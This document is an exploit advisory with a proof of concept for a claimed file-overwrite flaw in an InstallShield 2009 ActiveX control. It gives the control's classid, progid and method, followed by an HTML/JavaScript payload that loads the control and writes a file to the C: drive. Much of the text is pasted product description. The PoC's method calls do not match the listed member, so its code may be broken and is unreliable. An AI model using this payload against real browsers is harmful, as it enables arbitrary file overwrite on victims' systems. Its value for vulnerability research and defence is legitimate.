|
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
""" :::::: :: :: :: :: :: :::: """
""" :: :: :: :: :::::: .. :::: :: """
""" ::::: ::: ::::: :: :: :: :: :: :::: """
""" :: :: :: :: : :: :: :: :: :: :: """
""" :::::: :: :: ::::: :: :::::: :: :: :::: rs.ir """
""" :: """
""" """
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Anti-Security Research Team & Security Institute
#[+] Bug : Installshiled 2009 premier 15.0.0.53 Activex (ISWiAutomation15.dll) File Overwrite Expl0it
#[+] program Download : http://www.installshield.com/downloads
#[+] Author : the_Edit0r
#[+] Contact me : the_3dit0r[at]Yahoo[dot]coM
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP2 with Internet Explorer 7
#[+] web site: Expl0iters.ir * Anti-security.ir
#[+] Big thnx: Aria-Security Team & H4ckcity Member
# Part Description :
--------------------
InstallShield lets you easily create Windows Installer and InstallScript installations and extend them
to database servers, Web services, and mobile devices. New Features InstallShield includes the following
new features. Ability to Associate InstallShield Prerequisites with Features for Chaining Installations
InstallShield now enables you to associate InstallShield prerequisites with one or more features. This
new type of InstallShield prerequisite is called a feature prerequisite. It is installed if a feature
that contains the prerequisite is installed and if the prerequisite is not already installed on the system.
Including InstallShield prerequisites in your project enables you to chain multiple installations together,
bypassing the Windows Installer limitation that permits only one Execute sequence to be run at a time.The
Setup.exe setup launcher serves as a bootstrap application that manages the chaining. The Redistributables
view is where you add InstallShield prerequisites to a project and specify whether you want them to run
before your main installation or be associated with one or more features in your main installation.Previously,
all InstallShield prerequisite installations were run before the main installation ran, and the InstallShield
prerequisites could not be associated with any features. This type of prerequisite, which is still available,
is called a setup prerequisite. Basic MSI and Web projects include support for this feature.
------------------------------------
targetFile = "E:\Program Files\InstallShield\2009\System\ISWiAutomation15.dll"
prototype = "Function InsertCustomAction ( ByVal pCustomAction As _ISWiCustomAction , ByVal sComment As String , ByVal sCondition As String , ByVal lSequenceNumber As Long ) As _ISWiSequenceRecord"
memberName = "InsertCustomAction"
progid = "ISWiAuto15.ISWiSequence"
# Part Expl0it & Bug Codes ( Poc ) :
------------------------------------
<b>
Installshiled 2009 premier 15.0.0.53 File Overwrite Expl0it <b/>
by : the_Edit0r <b/>
<b/>
<object classid='clsid:34E7A6F9-F260-46BD-AAC8-1E70E22139D2' id='Edit0r'></object>
<script>
try{
var obj = document.InsertCustomAction('Edit0r');
obj.AddPage(1);
obj.SaveToFile("C:/system_.ini");
window.alert('check C:');
} catch(err){ window.alert('Poc failed'); }
</script>
|
推荐
评论(0条)
